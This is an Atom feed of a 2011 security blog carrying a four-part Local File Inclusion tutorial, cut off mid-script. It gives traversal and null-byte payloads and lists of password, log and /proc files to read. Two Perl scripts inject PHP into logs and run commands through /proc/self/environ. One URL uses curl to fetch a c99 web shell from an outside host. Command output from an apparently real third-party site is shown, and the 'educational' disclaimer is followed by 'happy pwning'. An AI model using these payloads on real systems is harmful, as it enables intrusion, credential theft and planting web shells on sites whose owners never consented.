<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-5305311560066067589</id><updated>2011-11-28T07:48:20.260+08:00</updated><category term='Steganography'/><category term='SYN Flood'/><category term='Hping'/><category term='Wireless'/><category term='SSH'/><category term='Ettercap'/><category term='Backtrack'/><category term='Spoofing'/><category term='Cloud Computing'/><category term='Application Security'/><category term='Netcat'/><category term='Cracking'/><category term='Wireshark'/><category term='Full Disclosure'/><category term='Metasploit'/><category term='Bypassing Firewalls'/><category term='Forensics'/><category term='Cisco'/><category term='Nmap'/><category term='Fragroute'/><category term='Windows'/><category term='Exploit Tools'/><category term='Proof of Concept'/><category term='Intranet'/><category term='Web Hacking'/><category term='LFI'/><category term='Spy Tricks'/><category term='Redirects'/><category term='Tools'/><category term='Honeypot'/><category term='VNC'/><category term='CSRF'/><category term='XSS'/><category term='Ethical Hacking'/><category term='Browser Exploitation'/><category term='RFI'/><title type='text'>Certified Ethical Hacker</title><subtitle type='html'>Information Security Awareness Through Ethical Hacking Education. Warning : All topics presented in this blog are for educational purposes only and should NOT be used for illegal purposes.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default?start-index=101&amp;max-results=100'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>139</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-1014295465838487743</id><published>2011-11-02T21:41:00.000+08:00</published><updated>2011-11-02T21:42:07.690+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='LFI'/><title type='text'>Local File Inclusion Tutorial Part 4 of 4</title><content type='html'>&lt;b&gt;&lt;span style="color: #848484; font-family: Courier New; font-size: xx-small;"&gt;For the last part of our series, I have put together this list to go beyond /etc/passwd where we can find an LFI &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;/proc/&lt;/span&gt;&lt;br /&gt;In the /proc/ can view information about the kernel, system, hardware etc..&lt;br /&gt;Paths:&lt;br /&gt;/proc/version&lt;br /&gt;/proc/interrupts&lt;br /&gt;/proc/meminfo&lt;br /&gt;/proc/mounts&lt;br /&gt;/proc/modules&lt;br /&gt;/proc/partitions&lt;br /&gt;/proc/filesystems&lt;br /&gt;/proc/kallsyms&lt;br /&gt;/proc/cpuinfo&lt;br /&gt;/proc/cmdline&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;/proc/self/&lt;/span&gt;&lt;br /&gt;The /proc/self is a link to the running process.&lt;br /&gt;Paths:&lt;br /&gt;/proc/self/environ&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;/proc/sys&lt;/span&gt;&lt;br /&gt;The /proc/sys provides information but also (being an administrator) can enable or disable kernel features&lt;br /&gt;Paths:&lt;br /&gt;/proc/sys/fs&lt;br /&gt;/proc/sys/dev/&lt;br /&gt;/proc/sys/kernel/&lt;br /&gt;/proc/sys/kernel/acct&lt;br /&gt;/proc/sys/kernel/cap-bound&lt;br /&gt;/proc/sys/kernel/domainname&lt;br /&gt;/proc/sys/kernel/exec-shield&lt;br /&gt;/proc/sys/kernel/exec-shield-randomize&lt;br /&gt;/proc/sys/kernel/hostname&lt;br /&gt;/proc/sys/kernel/hotplug&lt;br /&gt;/proc/sys/kernel/modprobe&lt;br /&gt;/proc/sys/kernel/version&lt;br /&gt;/proc/sys/kernel/sysrq&lt;br /&gt;/proc/sys/net/core/&lt;br /&gt;/proc/sys/net/ipv4/&lt;br /&gt;/proc/sys/vm/&lt;br /&gt;/proc/sysvipc&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;/proc/net&lt;/span&gt;&lt;br /&gt;The /proc/net displays information about the system's network configuration.&lt;br /&gt;Paths:&lt;br /&gt;/proc/net/arp&lt;br /&gt;/proc/net/atm&lt;br /&gt;/proc/net/dev&lt;br /&gt;/proc/net/dev_mcast&lt;br /&gt;/proc/net/igmp&lt;br /&gt;/proc/net/ip_conntrack&lt;br /&gt;/proc/net/ip_tables_names&lt;br /&gt;/proc/net/ip_mr_cache&lt;br /&gt;/proc/net/ip_mr_vif&lt;br /&gt;/proc/net/netstat&lt;br /&gt;/proc/net/psched&lt;br /&gt;/proc/net/raw&lt;br /&gt;/proc/net/route&lt;br /&gt;/proc/net/rt_cache&lt;br /&gt;/proc/net/snmp&lt;br /&gt;/proc/net/sockstat&lt;br /&gt;/proc/net/tcp&lt;br /&gt;/proc/net/tr_rif&lt;br /&gt;/proc/net/udp&lt;br /&gt;/proc/net/unix&lt;br /&gt;/proc/net/wireless&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;/proc/driver&lt;/span&gt;&lt;br /&gt;The /proc/driver contains information about drivers that are being used in the system.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;Other interesting paths&lt;/span&gt;&lt;br /&gt;/proc/bus/&lt;br /&gt;/proc/bus/usb/&lt;br /&gt;/proc/bus/usb/devices&lt;br /&gt;/proc/fs/nfsd/exports&lt;br /&gt;/proc/tty/&lt;br /&gt;/proc/tty/driver/serial&lt;br /&gt;/proc/scsi/&lt;br /&gt;/proc/ide/piix&lt;br /&gt;/proc/ide/&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: #848484; font-family: Courier New; font-size: xx-small;"&gt;Bonus :&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: #848484; font-family: Courier New; font-size: xx-small;"&gt; &lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: #848484; font-family: Courier New; font-size: xx-small;"&gt;You can also add to the list the following:&lt;br /&gt;&lt;br /&gt;/etc/resolv.conf   &lt;br /&gt;/etc/hosts           &lt;br /&gt;/etc/postifx/main.cf ... (there are a few &lt;br /&gt;&lt;br /&gt;Also, you can look for anti-rootkit and security stuff, for example:&lt;br /&gt;&lt;br /&gt;/etc/rkhunter.conf&lt;br /&gt;/etc/ossec-init.cnf&lt;br /&gt;/etc/snort/rules/snort.conf&lt;br /&gt;...&lt;br /&gt;&lt;br /&gt;Startup scripts:&lt;br /&gt;&lt;br /&gt;/etc/init.d/clamd&lt;br /&gt;/etc/init.d/snortd&lt;br /&gt;..&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: #848484; font-family: Courier New; font-size: xx-small;"&gt;Good luck and happy pwning! :)&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style="color: #848484; font-family: Courier New; font-size: xx-small;"&gt; &lt;/span&gt;&lt;/b&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-1014295465838487743?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/1014295465838487743/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2011/11/local-file-inclusion-tutorial-part-4-of.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1014295465838487743'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1014295465838487743'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2011/11/local-file-inclusion-tutorial-part-4-of.html' title='Local File Inclusion Tutorial Part 4 of 4'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-4079350589210427724</id><published>2011-09-29T12:38:00.000+08:00</published><updated>2011-09-29T12:38:17.880+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='LFI'/><title type='text'>Local File Inclusion Tutorial Part 3 of 4</title><content type='html'>&lt;div class="smallfont"&gt;          &lt;strong&gt;LFI Technique&lt;/strong&gt;    &lt;/div&gt;&lt;hr size="1" style="background-color: #202020; color: #202020;" /&gt;              &lt;div id="post_message_19215"&gt;        &lt;span style="color: grey;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-family: Lucida Console;"&gt;When a request to a php page is made, apache forks (creating a new proccess) and exec' the php binary to actually run/interpret the php script. As in every *nix system each process that runs, has it's own /proc entry, it can be quite useful to us, since it holds a lot information about the process and the enviroment where it is running.&lt;br /&gt;&lt;br /&gt;More specifically, the file /proc/self/environ of a php process running has something like this:&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 98px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/binï¿½&lt;br /&gt;SERVER_ADMIN=webmaster@this.domainï¿½&lt;br /&gt;(...)&lt;br /&gt;(X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20061201 Firefox/2.0.0.4 Gentooï¿½HTTP_KEEP_ALIVE=300ï¿½&lt;br /&gt;(...)&lt;/pre&gt;&lt;/div&gt;That "Gentoo" is actually part of the userAgent of my browser. So guess what...&lt;br /&gt;imagine that we change the userAgent of the browser to  and make a request like:&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 34px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;http://somesite.com/index.php?file=../../../../../proc/self/environ&lt;/pre&gt;&lt;/div&gt;you guessed right. it works Smile the php system is actually executed Smile&lt;br /&gt;&lt;br /&gt;So, after coding this little perl script&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 338px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;#!/usr/bin/perl -w&lt;br /&gt;use strict;&lt;br /&gt;use LWP 5.64;&lt;br /&gt;use LWP::UserAgent;&lt;br /&gt;&lt;br /&gt;my $browser = LWP::UserAgent-&amp;gt;new;&lt;br /&gt;my $url = $ARGV[0];&lt;br /&gt;my ($line,$response);&lt;br /&gt;$url .= "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ";&lt;br /&gt;&lt;br /&gt;print "jcfsprompt: ";&lt;br /&gt;while( $line = &lt;stdin&gt;) {&lt;br /&gt;chop($line);&lt;br /&gt;$browser-&amp;gt;agent("jcfs /dev/stdout");?&amp;gt;jcfs");&lt;br /&gt;$response = $browser-&amp;gt;get( $url );&lt;br /&gt;if ($response-&amp;gt;content =~ /jcfs(.*)jcfs/s) {&lt;br /&gt;print $1;&lt;br /&gt;}&lt;br /&gt;print "jcfsprompt: ";&lt;br /&gt;}&lt;/stdin&gt;&lt;/pre&gt;&lt;/div&gt;I tried something like this...&lt;br /&gt;&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 274px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;jcfs@heaven ~/boxes $ perl lfi.pl http://www.fastfrags.co.uk/index.php?page=&lt;br /&gt;jcfsprompt: id&lt;br /&gt;uid=32004(fastfr00) gid=32005(fastfr00) groups=32005(fastfr00) context=system_u:system_r:initrc_t&lt;br /&gt;jcfsprompt: uname -r&lt;br /&gt;2.6.15-1.2054_FC5&lt;br /&gt;jcfsprompt: pwd&lt;br /&gt;/home/fastfr00/public_html&lt;br /&gt;jcfsprompt: ls -l&lt;br /&gt;total 2280&lt;br /&gt;-rw-r--r-- 1 fastfr00 fastfr00 17116 Oct 24 2006 401.shtml&lt;br /&gt;-rw-r--r-- 1 fastfr00 fastfr00 16941 Oct 24 2006 403.shtml&lt;br /&gt;-rw-r--r-- 1 fastfr00 fastfr00 17327 Oct 24 2006 404.shtml&lt;br /&gt;-rw-r--r-- 1 fastfr00 fastfr00 17026 Mar 21 17:30 500.shtml&lt;br /&gt;drwxr-xr-x 2 fastfr00 fastfr00 4096 Aug 24 2006 _private&lt;br /&gt;drwxr-xr-x 4 fastfr00 fastfr00 4096 Aug 24 2006 _vti_bin&lt;br /&gt;(...)&lt;/pre&gt;&lt;/div&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;   &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-4079350589210427724?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/4079350589210427724/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2011/09/local-file-inclusion-tutorial-part-3-of.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/4079350589210427724'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/4079350589210427724'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2011/09/local-file-inclusion-tutorial-part-3-of.html' title='Local File Inclusion Tutorial Part 3 of 4'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-1049084849309673328</id><published>2011-09-08T22:34:00.000+08:00</published><updated>2011-09-08T22:34:18.765+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='LFI'/><title type='text'>Local File Inclusion Tutorial Part 2 of 4</title><content type='html'>&lt;span style="color: #848484; font-family: Courier New; font-size: xx-small;"&gt;&lt;span style="font-family: Comic Sans MS;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;span style="color: grey;"&gt;Required:&lt;br /&gt;1. site vuln to lfi&lt;br /&gt;2. php knowledge&lt;br /&gt;3. browser Mozilla Firefox...&lt;br /&gt;================================&lt;br /&gt;&lt;br /&gt;So... first you find some site vuln to lfi... now we must check if there are logs...&lt;br /&gt;They are usually stored in /proc/self/environ... so just replace /etc/passwd with /proc/self/environ&lt;br /&gt;&lt;br /&gt;If you get something like "DOCUMENT_ROOT=..." then it means you sucessfully found logs :D&lt;br /&gt;&lt;br /&gt;Now,on that page you can find something like "HTTP_USER_AGENT"...&lt;br /&gt;This value is usually our useragent(mozilla,netscape,etc) and now we must spoof it... but how?&lt;br /&gt;&lt;br /&gt;Open a new tab in Mozilla,and type "about:config" (without quotes)...&lt;br /&gt;&lt;br /&gt;Now,in "Filter" type: general.useragent.extra.firefox&lt;br /&gt;&lt;br /&gt;You will get something like this:&lt;br /&gt;&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 50px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;Preference name                            Status     Type        Value&lt;br /&gt;general.useragent.extra.firefox     default     string       Firefox/3.0.7&lt;/pre&gt;&lt;/div&gt;Now,double click on general.useragent.extra.firefox and replace "Firefox/3.0.7"&lt;br /&gt;with &lt;br /&gt;&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 34px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;&lt;/pre&gt;&lt;/div&gt;If everything is good you will get shell included... Otherwise,you will get errors... Mostly I was getting error "URL-File access disabled" or something like that... but using php I found another way...&lt;br /&gt;&lt;br /&gt;Instead of typing &lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 34px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;&lt;/pre&gt;&lt;/div&gt;as useragent,type this:&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 34px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;&lt;/pre&gt;&lt;/div&gt;Then load your vuln page like this:&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 34px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;http://yourvulnsite.com/vulnscript.php?page=../../../proc/self/environ?cmd=curl http://shelladress.com/c99.txt -o c99.php&lt;/pre&gt;&lt;/div&gt;So,lets review... basicaly,you are just adding &amp;amp;cmd= thing at the end of url...&lt;br /&gt;&lt;br /&gt;Now,using "curl" command you will get content of shell in txt format and by using -o c99.php you will rename it to c99.php...&lt;br /&gt;&lt;br /&gt;Now simply go to your site like this: &lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset; height: 34px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;"&gt;http://yourvulnsite.com/c99.php&lt;/pre&gt;&lt;/div&gt;And that's all for now...cheers! &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-1049084849309673328?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/1049084849309673328/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2011/09/local-file-inclusion-tutorial-part-2-of.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1049084849309673328'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1049084849309673328'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2011/09/local-file-inclusion-tutorial-part-2-of.html' title='Local File Inclusion Tutorial Part 2 of 4'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-2519854956598745140</id><published>2011-08-30T11:25:00.000+08:00</published><updated>2011-08-30T11:25:29.315+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='LFI'/><title type='text'>Local File Inclusion Tutorial Part 1 of 4</title><content type='html'>&lt;div class="smallfont"&gt;&lt;b&gt;Local File Inclusion Tutorial&lt;/b&gt; 			&lt;/div&gt;&lt;hr size="1" style="background-color: #202020; color: #202020;" /&gt;&lt;div id="post_message_2174"&gt;This tutorial will guide you into the process of exploiting a website thru the LFI (Local File Inclusion).&lt;br /&gt;&lt;br /&gt;First lets take a look at a php code that is vulnerable to LFI:&lt;br /&gt;&lt;br /&gt;PHP Code:&lt;br /&gt;&lt;div align="left"&gt;&lt;span style="color: black;"&gt; &lt;span style="color: #0000bb;"&gt; $page &lt;/span&gt;&lt;span style="color: #007700;"&gt;= &lt;/span&gt;&lt;span style="color: #0000bb;"&gt;$_GET&lt;/span&gt;&lt;span style="color: #007700;"&gt;[&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;page&lt;/span&gt;&lt;span style="color: #007700;"&gt;]; &lt;br /&gt;include(&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;$page&lt;/span&gt;&lt;span style="color: #007700;"&gt;); &lt;br /&gt;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;?&amp;gt;&lt;/span&gt; &lt;/span&gt;               &lt;/div&gt;&lt;br /&gt;Now, this is a piece of code that should NEVER be used, because the $page isn't sanitized and is passed directly to the webpage, but unfortunately (or not ) is very common to be find in the www world.&lt;br /&gt;&lt;br /&gt;Ok, now that we know why is it vulnerable let's start to use this in our advantage. First let's take a look how this give us the ability to "browse" thru the web server. Let's imagine theres a file called test.php inside the test directory, if you type victim.com/test/test.php will retrive that file correct? Ok, but if the php code that we examined was in the index.php we could also retrive that file thru victim.com/index.php?page=test/test.php , see what happened there? Now, if the index.php was in victim.com/test/index.php and the test.php in victim.com/test.php you will have to type victim.com/test/index.php?page=../test.php . The ../ is called directory&lt;br /&gt;transversal using that will allow you to go up in the directories.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now that we can go up and down thru the server let's use it to access files that we are not supposed to. If this was hosted in a Unix server we can then possibly view the password file of the server, to do this you will have to type something like this (the nr of ../ may vary depending of where the vulnerable file is):&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;victim.com/index.php?page=../../../../../../../etc/passwd &lt;br /&gt;&lt;br /&gt;If you don't know what to do with the content of etc/passwd then continue reading! :puah[1]: The etc/passwd is where the users/passwords are stored, a non shadowed passwd file will look like this:&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;username: passwd:UID:GID:full_name:directory:shell &lt;br /&gt;For example: &lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;username:kbeMVnZM0oL7I:503:100:FullName:/home/username:/bin/sh &lt;br /&gt;All you need to do then is grab the username and decode the password. If the passwd file is shadowed then you'll see something like this:&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;username:x:503:100:FullName:/home/username:/bin/sh &lt;br /&gt;As you can see the password is now a x and the encoded password is now in /etc/shadow (you will probably not have access to etc/shadow because is only readable/writeable by root and etc/passwd has to be readable by many &lt;br /&gt;processes, thats why you have access to it).&lt;br /&gt;&lt;br /&gt;You can also sometimes see something like this:&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;username:!:503:100:FullName:/home/username:/bin/sh &lt;br /&gt;The ! indicates that the encoded password is stored in the etc/security/passwd file.&lt;br /&gt;&lt;br /&gt;Heres a couple of places that may be interesting to "visit":&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;/etc/passwd&lt;br /&gt;/etc/shadow&lt;br /&gt;/etc/group&lt;br /&gt;/etc/security/group&lt;br /&gt;/etc/security/passwd&lt;br /&gt;/etc/security/user&lt;br /&gt;/etc/security/environ&lt;br /&gt;/etc/security/limits&lt;br /&gt;/usr/lib/security/mkuser.default                                 &lt;br /&gt;You will probably need to google for it as this is not the right tutorial to it.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Just one more quick thing, its also common to find a vulnerable code like:&lt;br /&gt;&lt;br /&gt;PHP Code:&lt;br /&gt;&lt;div align="left"&gt;&lt;span style="color: black;"&gt; &lt;span style="color: #0000bb;"&gt; $page &lt;/span&gt;&lt;span style="color: #007700;"&gt;= &lt;/span&gt;&lt;span style="color: #0000bb;"&gt;$_GET&lt;/span&gt;&lt;span style="color: #007700;"&gt;[&lt;/span&gt;&lt;span style="color: #dd0000;"&gt;"page"&lt;/span&gt;&lt;span style="color: #007700;"&gt;]; &lt;br /&gt;include(&lt;/span&gt;&lt;span style="color: #dd0000;"&gt;"$page.php"&lt;/span&gt;&lt;span style="color: #007700;"&gt;); &lt;br /&gt;&lt;/span&gt;&lt;span style="color: #0000bb;"&gt;?&amp;gt;&lt;/span&gt; &lt;/span&gt;               &lt;/div&gt;&lt;br /&gt;In this case as you can see it will add a .php in the end of whatever you include! So if you type in your browser: &lt;br /&gt;victim.com/index.php?file=../../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;it will retrieve: &lt;br /&gt;victim.com/index.php?file=../../../../../../../../etc/passwd&lt;b&gt;.php&lt;/b&gt; that file don't exist, and you will see an error message, so you need to apply the null byte (%00):&lt;br /&gt;victim.com/index.php?file=../../../../../../../../etc/passwd&lt;b&gt;%00&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;With the null byte the server will ignore everything that comes after %00.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;There are other ways to use the LFI exploit, so continue reading, the REALLY fun is about to begin! :jeerat.gif&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;We will now gonna try to run commands on the server, we will do this by injecting php code in the httpd logs and then access them by the LFI! To do this first find out where the logs are stored, here is some locations that may be useful to you:&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;../apache/logs/error.log&lt;br /&gt;../apache/logs/access.log&lt;br /&gt;../../apache/logs/error.log&lt;br /&gt;../../apache/logs/access.log&lt;br /&gt;../../../apache/logs/error.log&lt;br /&gt;../../../apache/logs/access.log&lt;br /&gt;../../../../../../../etc/httpd/logs/acces_log&lt;br /&gt;../../../../../../../etc/httpd/logs/acces.log&lt;br /&gt;../../../../../../../etc/httpd/logs/error_log&lt;br /&gt;../../../../../../../etc/httpd/logs/error.log&lt;br /&gt;../../../../../../../var/www/logs/access_log&lt;br /&gt;../../../../../../../var/www/logs/access.log&lt;br /&gt;../../../../../../../usr/local/apache/logs/access_log&lt;br /&gt;../../../../../../../usr/local/apache/logs/access.log&lt;br /&gt;../../../../../../../var/log/apache/access_log&lt;br /&gt;../../../../../../../var/log/apache2/access_log&lt;br /&gt;../../../../../../../var/log/apache/access.log&lt;br /&gt;../../../../../../../var/log/apache2/access.log&lt;br /&gt;../../../../../../../var/log/access_log&lt;br /&gt;../../../../../../../var/log/access.log&lt;br /&gt;../../../../../../../var/www/logs/error_log&lt;br /&gt;../../../../../../../var/www/logs/error.log&lt;br /&gt;../../../../../../../usr/local/apache/logs/error_log&lt;br /&gt;../../../../../../../usr/local/apache/logs/error.log&lt;br /&gt;../../../../../../../var/log/apache/error_log&lt;br /&gt;../../../../../../../var/log/apache2/error_log&lt;br /&gt;../../../../../../../var/log/apache/error.log&lt;br /&gt;../../../../../../../var/log/apache2/error.log&lt;br /&gt;../../../../../../../var/log/error_log&lt;br /&gt;../../../../../../../var/log/error.log                                 &lt;br /&gt;Ok, now that you know where the logs are take a look at them and see what they store, at this example we will use a log that stores the "not found files" and the php code . You will then type at your browser victim.com/ and the php code will be logged because it "dosen't exist".&lt;br /&gt;&lt;br /&gt;This possibly won't work because if you go look into the log you will probably see the php code like this:&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;%3C?%20passthru(\$_GET[cmd])%20?&amp;gt;                                 &lt;br /&gt;because your browser will url encode the whole thing! So you'll need to use something else, if you don't have a script of your own you can use this perl script i've wrote:&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;#!/usr/bin/perl -w&lt;br /&gt;use IO::Socket;&lt;br /&gt;use LWP::UserAgent;&lt;br /&gt;$site="&lt;b&gt;victim.com&lt;/b&gt;";&lt;br /&gt;$path="&lt;b&gt;/folder/&lt;/b&gt;";&lt;br /&gt;$code="";&lt;br /&gt;$log = "&lt;b&gt;../../../../../../../etc/httpd/logs/error_log&lt;/b&gt;";&lt;br /&gt;&lt;br /&gt;print "Trying to inject the code";&lt;br /&gt;&lt;br /&gt;$socket = IO::Socket::INET-&amp;gt;new(Proto=&amp;gt;"tcp", PeerAddr=&amp;gt;"$site", PeerPort=&amp;gt;"80") or die "\nConnection Failed.\n\n";&lt;br /&gt;print $socket "GET ".$path.$code." 